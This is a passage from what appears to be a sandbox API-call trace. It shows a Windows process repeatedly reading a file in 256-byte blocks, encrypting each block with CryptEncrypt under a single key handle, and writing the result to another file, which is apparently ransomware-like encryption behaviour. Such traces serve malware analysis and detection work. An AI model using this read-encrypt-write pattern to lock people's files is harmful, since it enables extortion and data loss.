lpOverlapped=0x0) returned 1 [0143.617] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.617] GetLastError () returned 0x0 [0143.617] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.617] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.617] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.617] GetLastError () returned 0x0 [0143.617] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.617] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.617] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.617] GetLastError () returned 0x0 [0143.617] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.617] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.617] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.617] GetLastError () returned 0x0 [0143.617] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.617] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.617] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.617] GetLastError () returned 0x0 [0143.617] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.617] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.618] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.618] GetLastError () returned 0x0 [0143.618] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.618] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.618] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.618] GetLastError () returned 0x0 [0143.618] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.618] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.618] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.618] GetLastError () returned 0x0 [0143.618] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.618] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.618] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.618] GetLastError () returned 0x0 [0143.618] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.618] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.618] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.618] GetLastError () returned 0x0 [0143.618] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.618] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.618] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.618] GetLastError () returned 0x0 [0143.618] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.618] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.618] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.618] GetLastError () returned 0x0 [0143.618] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.619] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.619] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.619] GetLastError () returned 0x0 [0143.619] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.619] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.619] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.619] GetLastError () returned 0x0 [0143.619] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.619] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.619] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.619] GetLastError () returned 0x0 [0143.619] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.619] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.619] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.619] GetLastError () returned 0x0 [0143.619] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.619] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.619] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.619] GetLastError () returned 0x0 [0143.619] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.619] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.619] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.619] GetLastError () returned 0x0 [0143.619] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.619] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.620] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.620] GetLastError () returned 0x0 [0143.620] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.620] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.620] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.620] GetLastError () returned 0x0 [0143.620] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.620] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.620] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.620] GetLastError () returned 0x0 [0143.620] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.620] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.620] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.620] GetLastError () returned 0x0 [0143.620] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.620] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.620] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.620] GetLastError () returned 0x0 [0143.620] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.620] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.620] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.620] GetLastError () returned 0x0 [0143.620] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.620] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.620] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.620] GetLastError () returned 0x0 [0143.620] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.621] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.621] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.621] GetLastError () returned 0x0 [0143.621] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.621] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.621] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.621] GetLastError () returned 0x0 [0143.621] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.621] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.621] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.621] GetLastError () returned 0x0 [0143.621] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.621] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.621] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.621] GetLastError () returned 0x0 [0143.621] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.621] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.621] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.621] GetLastError () returned 0x0 [0143.621] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.621] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.621] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.621] GetLastError () returned 0x0 [0143.621] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.621] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.622] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.622] GetLastError () returned 0x0 [0143.622] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.622] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.622] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.622] GetLastError () returned 0x0 [0143.622] 